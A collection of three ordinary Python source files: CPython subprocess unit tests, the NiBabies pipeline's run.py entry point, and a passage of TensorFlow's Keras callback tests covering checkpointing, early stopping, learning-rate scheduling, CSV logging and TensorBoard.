ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""NiBabies runner."""
from .. import config
def main():
"""Entry point."""
from os import EX_SOFTWARE
from pathlib import Path
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description, write_bidsignore
parse_args()
# sentry_sdk = None
# if not config.execution.notrack:
# import sentry_sdk
# from ..utils.sentry import sentry_setup
# sentry_setup()
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / config.execution.run_uuid / "config.toml"
config_file.parent.mkdir(exist_ok=True, parents=True)
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
retcode = p.exitcode or retval.get("return_code", 0)
nibabies_wf = retval.get("workflow", None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of NiBabies).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if nibabies_wf and config.execution.write_graph:
nibabies_wf.write_graph(graph2use="colored", format="svg", simple_form=True)
retcode = retcode or (nibabies_wf is None) * EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate, args=(str(config_file), nibabies_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
# if sentry_sdk is not None:
# with sentry_sdk.configure_scope() as scope:
# scope.set_tag("run_uuid", config.execution.run_uuid)
# scope.set_tag("npart", len(config.execution.participant_label))
# sentry_sdk.add_breadcrumb(message="nibabies started", level="info")
# sentry_sdk.capture_message("nibabies started", level="info")
config.loggers.workflow.log(
15,
"\n".join(["nibabies config:"] + ["\t\t%s" % s for s in config.dumps().splitlines()]),
)
config.loggers.workflow.log(25, "nibabies started!")
# errno = 1 # Default is error exit unless otherwise set
try:
nibabies_wf.run(**config.nipype.get_plugin())
except Exception as e:
# if not config.execution.notrack:
# from ..utils.sentry import process_crashfile
# crashfolders = [
# config.execution.nibabies_dir,
# / "sub-{}".format(s)
# / "log"
# / config.execution.run_uuid
# for s in config.execution.participant_label
# ]
# for crashfolder in crashfolders:
# for crashfile in crashfolder.glob("crash*.*"):
# process_crashfile(crashfile)
# if "Workflow did not execute cleanly" not in str(e):
# sentry_sdk.capture_exception(e)
config.loggers.workflow.critical("nibabies failed: %s", e)
raise
else:
config.loggers.workflow.log(25, "nibabies finished successfully!")
# if not config.execution.notrack:
# success_message = "nibabies finished without errors"
# sentry_sdk.add_breadcrumb(message=success_message, level="info")
# sentry_sdk.capture_message(success_message, level="info")
# Bother users with the boilerplate only iff the workflow went okay.
boiler_file = config.execution.nibabies_dir / "logs" / "CITATION.md"
if boiler_file.exists():
if config.environment.exec_env in (
"singularity",
"docker",
"nibabies-docker",
):
boiler_file = Path("<OUTPUT_PATH>") / boiler_file.relative_to(
config.execution.output_dir
)
config.loggers.workflow.log(
25,
"Works derived from this nibabies execution should include the "
f"boilerplate text found in {boiler_file}.",
)
if config.workflow.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get("fsaverage", suffix="dseg", extension=[".tsv"]))
_copy_any(dseg_tsv, str(config.execution.nibabies_dir / "desc-aseg_dseg.tsv"))
_copy_any(dseg_tsv, str(config.execution.nibabies_dir / "desc-aparcaseg_dseg.tsv"))
# errno = 0
finally:
from ..reports.core import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
generate_reports(
config.execution.participant_label,
config.execution.nibabies_dir,
config.execution.run_uuid,
config=pkgrf("nibabies", "data/reports-spec.yml"),
packagename="nibabies",
)
write_derivative_description(config.execution.bids_dir, config.execution.nibabies_dir)
write_bidsignore(config.execution.nibabies_dir)
# if failed_reports and not config.execution.notrack:
# sentry_sdk.capture_message(
# "Report generation failed for %d subjects" % failed_reports,
# level="error",
# )
# sys.exit(int((errno + failed_reports) > 0))
if __name__ == "__main__":
raise RuntimeError(
"Please `pip install` this and run via the commandline interfaces, `nibabies <command>`"
)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(test.TestCase):
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)),
0.01,
atol=1e-4)
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@test_util.run_deprecated_v1
def test_TensorBoard(self):
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
# case: Sequential
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=temp_dir, histogram_freq=1, write_images=True,
write_grads=True, batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
# fit with validation data and accuracy
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
# fit generator with validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data
# histogram_freq must be zero
tsb.histogram_freq = 0
